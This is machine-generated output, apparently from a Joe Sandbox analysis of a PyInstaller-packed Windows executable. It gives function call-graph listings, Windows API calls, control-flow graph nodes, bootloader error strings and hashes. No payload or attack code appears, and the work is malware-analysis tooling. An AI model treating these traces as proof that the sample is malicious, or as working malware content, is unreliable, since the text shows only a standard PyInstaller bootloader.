GetCurrentProcess TerminateProcess 30015->30539 30018->29787 30019->29764 30020->29776 30022 7ff7ff581c80 49 API calls 30021->30022 30023 7ff7ff584650 30022->30023 30023->29797 30024->29827 30025->29831 30026->29834 30027->29838 30028->29846 30029->29840 30030->29845 30031->29845 30032->29808 30034->29826 30035->29867 30036->29867 30038 7ff7ff5836bc GetModuleFileNameW 30037->30038 30038->29871 30038->29872 30040 7ff7ff58932f FindClose 30039->30040 30041 7ff7ff589342 30039->30041 30040->30041 30042 7ff7ff58c5c0 _log10_special 8 API calls 30041->30042 30043 7ff7ff58371a 30042->30043 30043->29876 30043->29877 30044->29885 30045->29881 30046->29889 30047->29886 30048->29885 30050 7ff7ff590774 30049->30050 30068 7ff7ff5904d4 30050->30068 30052 7ff7ff59078d 30052->29900 30081 7ff7ff59042c 30053->30081 30056->29905 30057->29939 30058->29911 30059->29939 30060->29917 30061->29939 30062->29928 30063->29939 30064->29936 30065->29939 30066->29935 30067->29939 30069 7ff7ff59053e 30068->30069 30070 7ff7ff5904fe 30068->30070 30069->30070 30071 7ff7ff59054a 30069->30071 30080 7ff7ff59a884 37 API calls 2 library calls 30070->30080 30079 7ff7ff5954dc EnterCriticalSection 30071->30079 30074 7ff7ff59054f 30075 7ff7ff590658 71 API calls 30074->30075 30076 7ff7ff590561 30075->30076 30077 7ff7ff5954e8 _fread_nolock LeaveCriticalSection 30076->30077 30078 7ff7ff590525 30077->30078 30078->30052 30080->30078 30082 7ff7ff590456 30081->30082 30093 7ff7ff581a20 30081->30093 30083 7ff7ff5904a2 30082->30083 30084 7ff7ff590465 memcpy_s 30082->30084 30082->30093 30094 7ff7ff5954dc EnterCriticalSection 30083->30094 30095 7ff7ff594f78 11 API calls memcpy_s 30084->30095 30086 7ff7ff5904aa 30088 7ff7ff5901ac _fread_nolock 51 API calls 30086->30088 30090 7ff7ff5904c1 30088->30090 30089 7ff7ff59047a 30096 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 30089->30096 30092 7ff7ff5954e8 _fread_nolock LeaveCriticalSection 30090->30092 30092->30093 30093->29908 30093->29909 30095->30089 30096->30093 30097->29950 30099 7ff7ff586365 30098->30099 30100 7ff7ff581c80 49 API calls 30099->30100 30101 7ff7ff5863a1 30100->30101 30102 7ff7ff5863cd 30101->30102 30103 7ff7ff5863aa 30101->30103 30105 7ff7ff584620 49 API calls 30102->30105 30186 7ff7ff582710 54 API calls _log10_special 30103->30186 30106 7ff7ff5863e5 30105->30106 30107 7ff7ff586403 30106->30107 30187 7ff7ff582710 54 API calls _log10_special 30106->30187 30176 7ff7ff584550 30107->30176 30110 7ff7ff58c5c0 _log10_special 8 API calls 30111 7ff7ff58336e 30110->30111 30111->29966 30129 7ff7ff5864f0 30111->30129 30112 7ff7ff58641b 30115 7ff7ff584620 49 API calls 30112->30115 30114 7ff7ff589070 3 API calls 30114->30112 30116 7ff7ff586434 30115->30116 30117 7ff7ff586459 30116->30117 30118 7ff7ff586439 30116->30118 30182 7ff7ff589070 30117->30182 30188 7ff7ff582710 54 API calls _log10_special 30118->30188 30121 7ff7ff586466 30123 7ff7ff586472 30121->30123 30124 7ff7ff5864b1 30121->30124 30122 7ff7ff5863c3 30122->30110 30125 7ff7ff589400 2 API calls 30123->30125 30190 7ff7ff585820 137 API calls 30124->30190 30127 7ff7ff58648a GetLastError 30125->30127 30189 7ff7ff582c50 51 API calls _log10_special 30127->30189 30191 7ff7ff5853f0 30129->30191 30131 7ff7ff586516 30132 7ff7ff58651e 30131->30132 30133 7ff7ff58652f 30131->30133 30216 7ff7ff582710 54 API calls _log10_special 30132->30216 30198 7ff7ff584c80 30133->30198 30137 7ff7ff58654c 30141 7ff7ff58655c 30137->30141 30143 7ff7ff58656d 30137->30143 30138 7ff7ff58653b 30217 7ff7ff582710 54 API calls _log10_special 30138->30217 30140 7ff7ff58652a 30140->29962 30218 7ff7ff582710 54 API calls _log10_special 30141->30218 30144 7ff7ff58659d 30143->30144 30145 7ff7ff58658c 30143->30145 30147 7ff7ff5865bd 30144->30147 30148 7ff7ff5865ac 30144->30148 30219 7ff7ff582710 54 API calls _log10_special 30145->30219 30202 7ff7ff584d40 30147->30202 30220 7ff7ff582710 54 API calls _log10_special 30148->30220 30152 7ff7ff5865cc 30221 7ff7ff582710 54 API calls _log10_special 30152->30221 30154 7ff7ff5865dd 30155 7ff7ff5865fd 30154->30155 30156 7ff7ff5865ec 30154->30156 30158 7ff7ff58660f 30155->30158 30160 7ff7ff586620 30155->30160 30222 7ff7ff582710 54 API calls _log10_special 30156->30222 30223 7ff7ff582710 54 API calls _log10_special 30158->30223 30163 7ff7ff58664a 30160->30163 30224 7ff7ff597320 73 API calls 30160->30224 30162 7ff7ff586638 30225 7ff7ff597320 73 API calls 30162->30225 30163->30140 30226 7ff7ff582710 54 API calls _log10_special 30163->30226 30167 7ff7ff586060 30166->30167 30167->30167 30168 7ff7ff586089 30167->30168 30173 7ff7ff5860a0 __std_exception_copy 30167->30173 30258 7ff7ff582710 54 API calls _log10_special 30168->30258 30170 7ff7ff586095 30170->29964 30171 7ff7ff5861ab 30171->29964 30173->30171 30174 7ff7ff582710 54 API calls 30173->30174 30228 7ff7ff581470 30173->30228 30174->30173 30175->29966 30177 7ff7ff58455a 30176->30177 30178 7ff7ff589400 2 API calls 30177->30178 30179 7ff7ff58457f 30178->30179 30180 7ff7ff58c5c0 _log10_special 8 API calls 30179->30180 30181 7ff7ff5845a7 30180->30181 30181->30112 30181->30114 30183 7ff7ff589400 2 API calls 30182->30183 30184 7ff7ff589084 LoadLibraryExW 30183->30184 30185 7ff7ff5890a3 __std_exception_copy 30184->30185 30185->30121 30186->30122 30187->30107 30188->30122 30189->30122 30190->30122 30192 7ff7ff58541c 30191->30192 30193 7ff7ff585424 30192->30193 30194 7ff7ff5855c4 30192->30194 30227 7ff7ff596b14 48 API calls 30192->30227 30193->30131 30195 7ff7ff585787 __std_exception_copy 30194->30195 30196 7ff7ff5847c0 47 API calls 30194->30196 30195->30131 30196->30194 30199 7ff7ff584cb0 30198->30199 30200 7ff7ff58c5c0 _log10_special 8 API calls 30199->30200 30201 7ff7ff584d1a 30200->30201 30201->30137 30201->30138 30203 7ff7ff584d55 30202->30203 30204 7ff7ff581c80 49 API calls 30203->30204 30205 7ff7ff584da1 30204->30205 30206 7ff7ff581c80 49 API calls 30205->30206 30215 7ff7ff584e23 __std_exception_copy 30205->30215 30207 7ff7ff584de0 30206->30207 30210 7ff7ff589400 2 API calls 30207->30210 30207->30215 30208 7ff7ff58c5c0 _log10_special 8 API calls 30209 7ff7ff584e6e 30208->30209 30209->30152 30209->30154 30211 7ff7ff584df6 30210->30211 30212 7ff7ff589400 2 API calls 30211->30212 30213 7ff7ff584e0d 30212->30213 30214 7ff7ff589400 2 API calls 30213->30214 30214->30215 30215->30208 30216->30140 30217->30140 30218->30140 30219->30140 30220->30140 30221->30140 30222->30140 30223->30140 30224->30162 30225->30163 30226->30140 30227->30192 30229 7ff7ff5845b0 108 API calls 30228->30229 30230 7ff7ff581493 30229->30230 30231 7ff7ff5814bc 30230->30231 30232 7ff7ff58149b 30230->30232 30234 7ff7ff590744 73 API calls 30231->30234 30281 7ff7ff582710 54 API calls _log10_special 30232->30281 30236 7ff7ff5814d1 30234->30236 30235 7ff7ff5814ab 30235->30173 30237 7ff7ff5814f8 30236->30237 30238 7ff7ff5814d5 30236->30238 30242 7ff7ff581508 30237->30242 30243 7ff7ff581532 30237->30243 30282 7ff7ff594f78 11 API calls memcpy_s 30238->30282 30240 7ff7ff5814da 30283 7ff7ff582910 54 API calls _log10_special 30240->30283 30284 7ff7ff594f78 11 API calls memcpy_s 30242->30284 30245 7ff7ff581538 30243->30245 30253 7ff7ff58154b 30243->30253 30259 7ff7ff581210 30245->30259 30246 7ff7ff581510 30285 7ff7ff582910 54 API calls _log10_special 30246->30285 30249 7ff7ff5900bc 74 API calls 30252 7ff7ff5815c4 30249->30252 30250 7ff7ff5814f3 __std_exception_copy 30250->30249 30251 7ff7ff59040c _fread_nolock 53 API calls 30251->30253 30252->30173 30253->30250 30253->30251 30254 7ff7ff5815d6 30253->30254 30286 7ff7ff594f78 11 API calls memcpy_s 30254->30286 30256 7ff7ff5815db 30287 7ff7ff582910 54 API calls _log10_special 30256->30287 30258->30170 30260 7ff7ff581268 30259->30260 30261 7ff7ff581297 30260->30261 30262 7ff7ff58126f 30260->30262 30265 7ff7ff5812d4 30261->30265 30266 7ff7ff5812b1 30261->30266 30292 7ff7ff582710 54 API calls _log10_special 30262->30292 30264 7ff7ff581282 30264->30250 30270 7ff7ff5812e6 30265->30270 30280 7ff7ff581309 memcpy_s 30265->30280 30293 7ff7ff594f78 11 API calls memcpy_s 30266->30293 30268 7ff7ff5812b6 30294 7ff7ff582910 54 API calls _log10_special 30268->30294 30295 7ff7ff594f78 11 API calls memcpy_s 30270->30295 30272 7ff7ff5812eb 30296 7ff7ff582910 54 API calls _log10_special 30272->30296 30273 7ff7ff59040c _fread_nolock 53 API calls 30273->30280 30275 7ff7ff590180 37 API calls 30275->30280 30276 7ff7ff5812cf __std_exception_copy 30276->30250 30277 7ff7ff5813cf 30297 7ff7ff582710 54 API calls _log10_special 30277->30297 30280->30273 30280->30275 30280->30276 30280->30277 30288 7ff7ff590b4c 30280->30288 30281->30235 30282->30240 30283->30250 30284->30246 30285->30250 30286->30256 30287->30250 30289 7ff7ff590b7c 30288->30289 30298 7ff7ff59089c 30289->30298 30291 7ff7ff590b9a 30291->30280 30292->30264 30293->30268 30294->30276 30295->30272 30296->30276 30297->30276 30299 7ff7ff5908e9 30298->30299 30300 7ff7ff5908bc 30298->30300 30299->30291 30300->30299 30301 7ff7ff5908f1 30300->30301 30302 7ff7ff5908c6 30300->30302 30305 7ff7ff5907dc 30301->30305 30312 7ff7ff59a884 37 API calls 2 library calls 30302->30312 30313 7ff7ff5954dc EnterCriticalSection 30305->30313 30307 7ff7ff5907f9 30308 7ff7ff59081c 74 API calls 30307->30308 30309 7ff7ff590802 30308->30309 30310 7ff7ff5954e8 _fread_nolock LeaveCriticalSection 30309->30310 30311 7ff7ff59080d 30310->30311 30311->30299 30312->30299 30314->29969 30319 7ff7ff594a4e 30315->30319 30316 7ff7ff594a73 30333 7ff7ff59a884 37 API calls 2 library calls 30316->30333 30318 7ff7ff594aaf 30334 7ff7ff592c80 49 API calls _invalid_parameter_noinfo 30318->30334 30319->30316 30319->30318 30321 7ff7ff594b46 30322 7ff7ff594b8c 30321->30322 30326 7ff7ff594bb0 30321->30326 30327 7ff7ff594b61 30321->30327 30330 7ff7ff594b58 30321->30330 30324 7ff7ff59a9b8 __free_lconv_mon 11 API calls 30322->30324 30323 7ff7ff58c5c0 _log10_special 8 API calls 30325 7ff7ff581cc8 30323->30325 30332 7ff7ff594a9d 30324->30332 30325->29730 30326->30322 30328 7ff7ff594bba 30326->30328 30335 7ff7ff59a9b8 30327->30335 30331 7ff7ff59a9b8 __free_lconv_mon 11 API calls 30328->30331 30330->30322 30330->30327 30331->30332 30332->30323 30333->30332 30334->30321 30336 7ff7ff59a9bd RtlFreeHeap 30335->30336 30340 7ff7ff59a9ec 30335->30340 30337 7ff7ff59a9d8 GetLastError 30336->30337 30336->30340 30338 7ff7ff59a9e5 __free_lconv_mon 30337->30338 30341 7ff7ff594f78 11 API calls memcpy_s 30338->30341 30340->30332 30341->30340 30343 7ff7ff595f38 30342->30343 30344 7ff7ff595f5e 30343->30344 30347 7ff7ff595f91 30343->30347 30373 7ff7ff594f78 11 API calls memcpy_s 30344->30373 30346 7ff7ff595f63 30374 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 30346->30374 30349 7ff7ff595fa4 30347->30349 30350 7ff7ff595f97 30347->30350 30361 7ff7ff59ac98 30349->30361 30375 7ff7ff594f78 11 API calls memcpy_s 30350->30375 30352 7ff7ff584606 30352->29984 30355 7ff7ff595fc5 30368 7ff7ff59ff3c 30355->30368 30356 7ff7ff595fb8 30376 7ff7ff594f78 11 API calls memcpy_s 30356->30376 30359 7ff7ff595fd8 30377 7ff7ff5954e8 LeaveCriticalSection 30359->30377 30378 7ff7ff5a0348 EnterCriticalSection 30361->30378 30363 7ff7ff59acaf 30364 7ff7ff59ad0c 19 API calls 30363->30364 30365 7ff7ff59acba 30364->30365 30366 7ff7ff5a03a8 _isindst LeaveCriticalSection 30365->30366 30367 7ff7ff595fae 30366->30367 30367->30355 30367->30356 30379 7ff7ff59fc38 30368->30379 30372 7ff7ff59ff96 30372->30359 30373->30346 30374->30352 30375->30352 30376->30352 30384 7ff7ff59fc73 __vcrt_InitializeCriticalSectionEx 30379->30384 30381 7ff7ff59ff11 30398 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 30381->30398 30383 7ff7ff59fe43 30383->30372 30391 7ff7ff5a6dc4 30383->30391 30384->30384 30389 7ff7ff59fe3a 30384->30389 30394 7ff7ff597aac 51 API calls 3 library calls 30384->30394 30386 7ff7ff59fea5 30386->30389 30395 7ff7ff597aac 51 API calls 3 library calls 30386->30395 30388 7ff7ff59fec4 30388->30389 30396 7ff7ff597aac 51 API calls 3 library calls 30388->30396 30389->30383 30397 7ff7ff594f78 11 API calls memcpy_s 30389->30397 30399 7ff7ff5a63c4 30391->30399 30394->30386 30395->30388 30396->30389 30397->30381 30398->30383 30400 7ff7ff5a63f9 30399->30400 30401 7ff7ff5a63db 30399->30401 30400->30401 30403 7ff7ff5a6415 30400->30403 30453 7ff7ff594f78 11 API calls memcpy_s 30401->30453 30410 7ff7ff5a69d4 30403->30410 30404 7ff7ff5a63e0 30454 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 30404->30454 30408 7ff7ff5a63ec 30408->30372 30456 7ff7ff5a6708 30410->30456 30413 7ff7ff5a6a61 30476 7ff7ff598590 30413->30476 30414 7ff7ff5a6a49 30488 7ff7ff594f58 11 API calls memcpy_s 30414->30488 30417 7ff7ff5a6a4e 30489 7ff7ff594f78 11 API calls memcpy_s 30417->30489 30425 7ff7ff5a6440 30425->30408 30455 7ff7ff598568 LeaveCriticalSection 30425->30455 30453->30404 30454->30408 30457 7ff7ff5a6734 30456->30457 30461 7ff7ff5a674e 30456->30461 30457->30461 30501 7ff7ff594f78 11 API calls memcpy_s 30457->30501 30459 7ff7ff5a6743 30502 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 30459->30502 30462 7ff7ff5a67cc 30461->30462 30503 7ff7ff594f78 11 API calls memcpy_s 30461->30503 30463 7ff7ff5a681d 30462->30463 30505 7ff7ff594f78 11 API calls memcpy_s 30462->30505 30474 7ff7ff5a687a 30463->30474 30507 7ff7ff599be8 37 API calls 2 library calls 30463->30507 30466 7ff7ff5a6876 30469 7ff7ff5a68f8 30466->30469 30466->30474 30467 7ff7ff5a6812 30506 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 30467->30506 30508 7ff7ff59a970 17 API calls _isindst 30469->30508 30471 7ff7ff5a67c1 30504 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 30471->30504 30474->30413 30474->30414 30509 7ff7ff5a0348 EnterCriticalSection 30476->30509 30488->30417 30489->30425 30501->30459 30502->30461 30503->30471 30504->30462 30505->30467 30506->30463 30507->30466 30511 7ff7ff597968 30510->30511 30514 7ff7ff597444 30511->30514 30513 7ff7ff597981 30513->29994 30515 7ff7ff59745f 30514->30515 30516 7ff7ff59748e 30514->30516 30525 7ff7ff59a884 37 API calls 2 library calls 30515->30525 30524 7ff7ff5954dc EnterCriticalSection 30516->30524 30519 7ff7ff597493 30521 7ff7ff5974b0 38 API calls 30519->30521 30520 7ff7ff59747f 30520->30513 30522 7ff7ff59749f 30521->30522 30523 7ff7ff5954e8 _fread_nolock LeaveCriticalSection 30522->30523 30523->30520 30525->30520 30527 7ff7ff58fee1 30526->30527 30528 7ff7ff58feb3 30526->30528 30531 7ff7ff58fed3 30527->30531 30536 7ff7ff5954dc EnterCriticalSection 30527->30536 30537 7ff7ff59a884 37 API calls 2 library calls 30528->30537 30531->29998 30532 7ff7ff58fef8 30533 7ff7ff58ff14 72 API calls 30532->30533 30534 7ff7ff58ff04 30533->30534 30535 7ff7ff5954e8 _fread_nolock LeaveCriticalSection 30534->30535 30535->30531 30537->30531 30538->30015 30540 7ff7ff582fe0 30541 7ff7ff582ff0 30540->30541 30542 7ff7ff58302b 30541->30542 30543 7ff7ff583041 30541->30543 30568 7ff7ff582710 54 API calls _log10_special 30542->30568 30545 7ff7ff583061 30543->30545 30556 7ff7ff583077 __std_exception_copy 30543->30556 30569 7ff7ff582710 54 API calls _log10_special 30545->30569 30547 7ff7ff58c5c0 _log10_special 8 API calls 30549 7ff7ff5831fa 30547->30549 30548 7ff7ff583037 __std_exception_copy 30548->30547 30550 7ff7ff581470 116 API calls 30550->30556 30551 7ff7ff583349 30576 7ff7ff582710 54 API calls _log10_special 30551->30576 30552 7ff7ff581c80 49 API calls 30552->30556 30554 7ff7ff583333 30575 7ff7ff582710 54 API calls _log10_special 30554->30575 30556->30548 30556->30550 30556->30551 30556->30552 30556->30554 30557 7ff7ff58330d 30556->30557 30559 7ff7ff583207 30556->30559 30574 7ff7ff582710 54 API calls _log10_special 30557->30574 30560 7ff7ff583273 30559->30560 30570 7ff7ff59a474 37 API calls 2 library calls 30559->30570 30562 7ff7ff58329e 30560->30562 30563 7ff7ff583290 30560->30563 30572 7ff7ff582dd0 37 API calls 30562->30572 30571 7ff7ff59a474 37 API calls 2 library calls 30563->30571 30566 7ff7ff58329c 30573 7ff7ff582500 54 API calls __std_exception_copy 30566->30573 30568->30548 30569->30548 30570->30560 30571->30566 30572->30566 30573->30548 30574->30548 30575->30548 30576->30548

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00007FF7FF581000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 0 7ff7ff581000-7ff7ff583806 call 7ff7ff58fe88 call 7ff7ff58fe90 call 7ff7ff58c8c0 call 7ff7ff595460 call 7ff7ff5954f4 call 7ff7ff5836b0 14 7ff7ff583808-7ff7ff58380f 0->14 15 7ff7ff583814-7ff7ff583836 call 7ff7ff581950 0->15 16 7ff7ff583c97-7ff7ff583cb2 call 7ff7ff58c5c0 14->16 20 7ff7ff58383c-7ff7ff583856 call 7ff7ff581c80 15->20 21 7ff7ff58391b-7ff7ff583931 call 7ff7ff5845b0 15->21 25 7ff7ff58385b-7ff7ff58389b call 7ff7ff588a20 20->25 27 7ff7ff58396a-7ff7ff58397f call 7ff7ff582710 21->27 28 7ff7ff583933-7ff7ff583960 call 7ff7ff587f80 21->28 35 7ff7ff58389d-7ff7ff5838a3 25->35 36 7ff7ff5838c1-7ff7ff5838cc call 7ff7ff594fa0 25->36 40 7ff7ff583c8f 27->40 38 7ff7ff583984-7ff7ff5839a6 call 7ff7ff581c80 28->38 39 7ff7ff583962-7ff7ff583965 call 7ff7ff5900bc 28->39 41 7ff7ff5838a5-7ff7ff5838ad 35->41 42 7ff7ff5838af-7ff7ff5838bd call 7ff7ff588b90 35->42 47 7ff7ff5839fc-7ff7ff583a2a call 7ff7ff588b30 call 7ff7ff588b90 * 3 36->47 48 7ff7ff5838d2-7ff7ff5838e1 call 7ff7ff588a20 36->48 53 7ff7ff5839b0-7ff7ff5839b9 38->53 39->27 40->16 41->42 42->36 76 7ff7ff583a2f-7ff7ff583a3e call 7ff7ff588a20 47->76 57 7ff7ff5838e7-7ff7ff5838ed 48->57 58 7ff7ff5839f4-7ff7ff5839f7 call 7ff7ff594fa0 48->58 53->53 56 7ff7ff5839bb-7ff7ff5839d8 call 7ff7ff581950 53->56 56->25 68 7ff7ff5839de-7ff7ff5839ef call 7ff7ff582710 56->68 62 7ff7ff5838f0-7ff7ff5838fc 57->62 58->47 65 7ff7ff5838fe-7ff7ff583903 62->65 66 7ff7ff583905-7ff7ff583908 62->66 65->62 65->66 66->58 70 7ff7ff58390e-7ff7ff583916 call 7ff7ff594fa0 66->70 68->40 70->76 79 7ff7ff583b45-7ff7ff583b53 76->79 80 7ff7ff583a44-7ff7ff583a47 76->80 82 7ff7ff583b59-7ff7ff583b5d 79->82 83 7ff7ff583a67 79->83 80->79 81 7ff7ff583a4d-7ff7ff583a50 80->81 84 7ff7ff583a56-7ff7ff583a5a 81->84 85 7ff7ff583b14-7ff7ff583b17 81->85 86 7ff7ff583a6b-7ff7ff583a90 call 7ff7ff594fa0 82->86 83->86 84->85 87 7ff7ff583a60 84->87 88 7ff7ff583b19-7ff7ff583b1d 85->88 89 7ff7ff583b2f-7ff7ff583b40 call 7ff7ff582710 85->89 95 7ff7ff583aab-7ff7ff583ac0 86->95 96 7ff7ff583a92-7ff7ff583aa6 call 7ff7ff588b30 86->96 87->83 88->89 91 7ff7ff583b1f-7ff7ff583b2a 88->91 97 7ff7ff583c7f-7ff7ff583c87 89->97 91->86 99 7ff7ff583be8-7ff7ff583bfa call 7ff7ff588a20 95->99 100 7ff7ff583ac6-7ff7ff583aca 95->100 96->95 97->40 108 7ff7ff583c2e 99->108 109 7ff7ff583bfc-7ff7ff583c02 99->109 102 7ff7ff583bcd-7ff7ff583be2 call 7ff7ff581940 100->102 103 7ff7ff583ad0-7ff7ff583ae8 call 7ff7ff5952c0 100->103 102->99 102->100 114 7ff7ff583aea-7ff7ff583b02 call 7ff7ff5952c0 103->114 115 7ff7ff583b62-7ff7ff583b7a call 7ff7ff5952c0 103->115 111 7ff7ff583c31-7ff7ff583c40 call 7ff7ff594fa0 108->111 112 7ff7ff583c1e-7ff7ff583c2c 109->112 113 7ff7ff583c04-7ff7ff583c1c 109->113 123 7ff7ff583c46-7ff7ff583c4a 111->123 124 7ff7ff583d41-7ff7ff583d63 call 7ff7ff5844d0 111->124 112->111 113->111 114->102 122 7ff7ff583b08-7ff7ff583b0f 114->122 125 7ff7ff583b7c-7ff7ff583b80 115->125 126 7ff7ff583b87-7ff7ff583b9f call 7ff7ff5952c0 115->126 122->102 127 7ff7ff583cd4-7ff7ff583ce6 call 7ff7ff588a20 123->127 128 7ff7ff583c50-7ff7ff583c5f call 7ff7ff5890e0 123->128 139 7ff7ff583d65-7ff7ff583d6f call 7ff7ff584620 124->139 140 7ff7ff583d71-7ff7ff583d82 call 7ff7ff581c80 124->140 125->126 135 7ff7ff583bac-7ff7ff583bc4 call 7ff7ff5952c0 126->135 136 7ff7ff583ba1-7ff7ff583ba5 126->136 144 7ff7ff583ce8-7ff7ff583ceb 127->144 145 7ff7ff583d35-7ff7ff583d3c 127->145 142 7ff7ff583cb3-7ff7ff583cbd call 7ff7ff588850 128->142 143 7ff7ff583c61 128->143 135->102 155 7ff7ff583bc6 135->155 136->135 153 7ff7ff583d87-7ff7ff583d96 139->153 140->153 161 7ff7ff583cc8-7ff7ff583ccf 142->161 162 7ff7ff583cbf-7ff7ff583cc6 142->162 150 7ff7ff583c68 call 7ff7ff582710 143->150 144->145 151 7ff7ff583ced-7ff7ff583d10 call 7ff7ff581c80 144->151 145->150 163 7ff7ff583c6d-7ff7ff583c77 150->163 168 7ff7ff583d2b-7ff7ff583d33 call 7ff7ff594fa0 151->168 169 7ff7ff583d12-7ff7ff583d26 call 7ff7ff582710 call 7ff7ff594fa0 151->169 158 7ff7ff583d98-7ff7ff583d9f 153->158 159 7ff7ff583dc4-7ff7ff583dda call 7ff7ff589400 153->159 155->102 158->159 165 7ff7ff583da1-7ff7ff583da5 158->165 171 7ff7ff583ddc 159->171 172 7ff7ff583de8-7ff7ff583e04 SetDllDirectoryW 159->172 161->153 162->150 163->97 165->159 166 7ff7ff583da7-7ff7ff583dbe SetDllDirectoryW LoadLibraryExW 165->166 166->159 168->153 169->163 171->172 175 7ff7ff583e0a-7ff7ff583e19 call 7ff7ff588a20 172->175 176 7ff7ff583f01-7ff7ff583f08 172->176 189 7ff7ff583e1b-7ff7ff583e21 175->189 190 7ff7ff583e32-7ff7ff583e3c call 7ff7ff594fa0 175->190 178 7ff7ff583f0e-7ff7ff583f15 176->178 179 7ff7ff583ffc-7ff7ff584004 176->179 178->179 183 7ff7ff583f1b-7ff7ff583f25 call 7ff7ff5833c0 178->183 184 7ff7ff584029-7ff7ff58403e call 7ff7ff5836a0 call 7ff7ff583360 call 7ff7ff583670 179->184 185 7ff7ff584006-7ff7ff584023 PostMessageW GetMessageW 179->185 183->163 196 7ff7ff583f2b-7ff7ff583f3f call 7ff7ff5890c0 183->196 211 7ff7ff584043-7ff7ff58405b call 7ff7ff586fb0 call 7ff7ff586d60 184->211 185->184 193 7ff7ff583e2d-7ff7ff583e2f 189->193 194 7ff7ff583e23-7ff7ff583e2b 189->194 199 7ff7ff583ef2-7ff7ff583efc call 7ff7ff588b30 190->199 200 7ff7ff583e42-7ff7ff583e48 190->200 193->190 194->193 209 7ff7ff583f64-7ff7ff583fa7 call 7ff7ff588b30 call 7ff7ff588bd0 call 7ff7ff586fb0 call 7ff7ff586d60 call 7ff7ff588ad0 196->209 210 7ff7ff583f41-7ff7ff583f5e PostMessageW GetMessageW 196->210 199->176 200->199 204 7ff7ff583e4e-7ff7ff583e54 200->204 207 7ff7ff583e56-7ff7ff583e58 204->207 208 7ff7ff583e5f-7ff7ff583e61 204->208 212 7ff7ff583e5a 207->212 213 7ff7ff583e67-7ff7ff583e83 call 7ff7ff586db0 call 7ff7ff587330 207->213 208->176 208->213 248 7ff7ff583fe9-7ff7ff583ff7 call 7ff7ff581900 209->248 249 7ff7ff583fa9-7ff7ff583fb3 call 7ff7ff589200 209->249 210->209 212->176 228 7ff7ff583e8e-7ff7ff583e95 213->228 229 7ff7ff583e85-7ff7ff583e8c 213->229 232 7ff7ff583e97-7ff7ff583ea4 call 7ff7ff586df0 228->232 233 7ff7ff583eaf-7ff7ff583eb9 call 7ff7ff5871a0 228->233 231 7ff7ff583edb-7ff7ff583ef0 call 7ff7ff582a50 call 7ff7ff586fb0 call 7ff7ff586d60 229->231 231->176 232->233 246 7ff7ff583ea6-7ff7ff583ead 232->246 242 7ff7ff583ebb-7ff7ff583ec2 233->242 243 7ff7ff583ec4-7ff7ff583ed2 call 7ff7ff5874e0 233->243 242->231 243->176 256 7ff7ff583ed4 243->256 246->231 248->163 249->248 259 7ff7ff583fb5-7ff7ff583fca 249->259 256->231 260 7ff7ff583fcc-7ff7ff583fdf call 7ff7ff582710 call 7ff7ff581900 259->260 261 7ff7ff583fe4 call 7ff7ff582a50 259->261 260->163 261->248
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                      • API String ID: 2776309574-4232158417
                                                                                                                                                                                                      • Opcode ID: a750c602d76a7e2a475d34e9f9d3ae9ffbdd5ab13f145aa1f50bf47f8f7acdc7
                                                                                                                                                                                                      • Instruction ID: 57a01c2ceafa3121435a7f2d813a76db16d70b1190a458cf91c2cf10d2ca6edc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a750c602d76a7e2a475d34e9f9d3ae9ffbdd5ab13f145aa1f50bf47f8f7acdc7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90328D21A0D6C291FB29BB25D4542F9E691BF45780FC84232DA7E432D6EF2CE565C3E0
                                                                                                                                                                                                      Function 00007FF7FF5A69D4 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
